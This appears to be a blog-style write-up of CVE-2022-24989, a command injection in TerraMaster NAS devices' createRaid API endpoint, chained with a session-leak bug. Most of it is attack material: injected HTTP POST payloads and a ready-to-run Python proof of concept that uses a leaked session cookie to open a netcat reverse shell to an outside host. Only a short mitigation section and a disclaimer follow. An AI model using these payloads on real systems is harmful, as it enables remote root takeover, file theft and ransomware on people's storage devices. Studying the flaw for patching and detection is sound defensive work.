TerraMaster NAS devices are popular for home and small business file storage. But in early 2022, two major security holes shocked the community: CVE-2022-24989 and CVE-2022-24990. Together, they let hackers take over a TerraMaster from anywhere on the internet—using nothing but a web request.
In this long read, we’ll break down how CVE-2022-24989 works, step by step. We’ll include code, easy-to-follow explanations, PoC (proof of concept) exploit, and reference links for further reading.
Attack Vector: WAN (internet) via simple HTTP POST
- Public Advisory: NVD Description
This vulnerability exists in the api.php?mobile/createRaid endpoint, where dangerous PHP code is called with untrusted user input—without validation.
The Offending Endpoint
The web API provides a “createRaid” action for remote configuration of RAID arrays. The endpoint is:
/api.php?mobile/createRaid
In the backend, PHP *popen()* is used to call system commands, feeding it parameters straight from the incoming POST request.
diskstring
Both these values are taken directly from the HTTP request and dropped into a system call. If you put a shell metacharacter in raidtype, you can break out and run any command as root.
Here’s a simplified vulnerable code flow (not the actual source)
// Pseudo-vulnerable handler
$raidtype = $_POST["raidtype"]; // e.g. raid5, but never sanitized!
$diskstring = $_POST["diskstring"]; // e.g. "sda,sdb,sdc"
// Dangerous popen call:
$cmd = "/sbin/mkraid --type=".$raidtype." --disks=".$diskstring;
$p = popen($cmd, 'r'); // No escaping!
Suppose the attacker sends
POST /api.php?mobile/createRaid HTTP/1.1
Host: NAS-IP
Content-Type: application/x-www-form-urlencoded
raidtype=raid5;id>/tmp/pwned.txt;&diskstring=sda,sdb
The command actually executed would become
/sbin/mkraid --type=raid5;id>/tmp/pwned.txt;& --disks=sda,sdb
1. Get a Session (CVE-2022-24990)
You’ll need a valid API token or session cookie. CVE-2022-24990 is a companion bug that lets you dump credentials. You can see attack chain details here.
Example (assuming credentials from previous bug)
Cookie: UserID=admin; SessionID=YOUR_LEAKED_SESSION_ID
2. Send Malicious Request
Then, craft a POST to /api.php?mobile/createRaid, passing your shell payload.
Example Exploit Payload
POST /api.php?mobile/createRaid HTTP/1.1
Host: NAS-IP
Cookie: UserID=admin; SessionID=leaked-session
Content-Type: application/x-www-form-urlencoded
raidtype=raid5;nc 1.2.3.4 4444 -e /bin/sh;&diskstring=sda,sdb
This opens a reverse shell to 1.2.3.4:4444. Netcat must be available on NAS.
Here is a basic PoC to open a reverse shell (for educational purpose only)
import requests
# Replace with your target NAS IP and credentials
TARGET = "http://192.168.1.100";
SESSION_COOKIE = {"UserID":"admin", "SessionID":"leaked-session"}
reverse_shell = "nc 1.2.3.4 4444 -e /bin/sh"
payload = f"raid5;{reverse_shell};&"
data = {
"raidtype": payload,
"diskstring": "sda,sdb"
}
resp = requests.post(
f"{TARGET}/api.php?mobile/createRaid",
cookies=SESSION_COOKIE,
data=data
)
print("Exploit sent. Check for your reverse shell!")
What’s the Impact?
An attacker *anywhere on the internet* can fully compromise a TerraMaster device—steal files, plant ransomware, or use it for further attacks.
Mitigation
1. Update: TerraMaster released a patch in May-June 2022. See official advisory.
Firewall Off WAN: Never expose NAS UI directly to the public internet!
3. Audit Logs: Check for suspicious requests to /api.php?mobile/createRaid.
References
- CVE-2022-24989 on NVD
- SSD Disclosure — TerraMaster RCE
- TerraMaster Forum Advisory
Final Notes
CVE-2022-24989 is a great lesson in why input validation is critical, especially in web interfaces to powerful devices. If you own a TerraMaster NAS, patch it ASAP—and lock down remote access.
Stay safe, keep things patched, and never trust user input—especially when it lands in a shell command!
*This guide is for educational and defensive purposes only. Don’t use exploits without permission on devices you do not own.*
Timeline
Published on: 08/20/2023 18:15:00 UTC
Last modified on: 08/24/2023 20:52:00 UTC